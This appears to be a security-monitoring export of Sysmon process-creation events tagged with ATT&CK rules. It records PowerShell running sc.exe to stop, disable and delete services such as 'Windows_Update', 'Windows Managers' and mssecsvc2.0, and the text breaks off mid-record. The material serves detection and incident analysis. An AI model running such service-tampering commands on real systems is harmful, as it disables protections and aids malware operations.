SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.194032600Z"",""eventRecordID"":""3195"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.185\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e03c2b00}\r\nProcessId: 3936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.185"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010e03c2b00}"",""processId"":""3936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.978",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.122 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010443a2b00} +ProcessId: 2432 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.127247700Z"",""eventRecordID"":""3193"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.122\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010443a2b00}\r\nProcessId: 2432\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.122"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010443a2b00}"",""processId"":""2432"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.966",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.087 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001061392b00} +ProcessId: 7744 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.090688700Z"",""eventRecordID"":""3192"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.087\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001061392b00}\r\nProcessId: 7744\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.087"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-001061392b00}"",""processId"":""7744"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.909",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.947 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-001086362b00} +ProcessId: 6544 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.956037500Z"",""eventRecordID"":""3189"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.947\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-001086362b00}\r\nProcessId: 6544\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.947"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-001086362b00}"",""processId"":""6544"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.845",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.866 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010ae332b00} +ProcessId: 5616 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.876146100Z"",""eventRecordID"":""3186"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.866\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010ae332b00}\r\nProcessId: 5616\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.866"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-0010ae332b00}"",""processId"":""5616"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.827",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.840 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010b1322b00} +ProcessId: 2788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config mssecsvc2.0 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config mssecsvc2.0 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.846472300Z"",""eventRecordID"":""3185"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.840\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-0010b1322b00}\r\nProcessId: 2788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config mssecsvc2.0 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:28.840"",""processGuid"":""{df9fc3d3-b3d0-5ecf-0000-0010b1322b00}"",""processId"":""2788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config mssecsvc2.0 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:56.790",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:28.761 +ProcessGuid: {df9fc3d3-b3d0-5ecf-0000-00109c302b00} +ProcessId: 2028 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:28.764376700Z"",""eventRecordID"":""3183"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:28.761\r\nProcessGuid: {df9fc3d3-b3d0-5ecf-0000-00109c302b00}\r\nProcessId: 2028\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 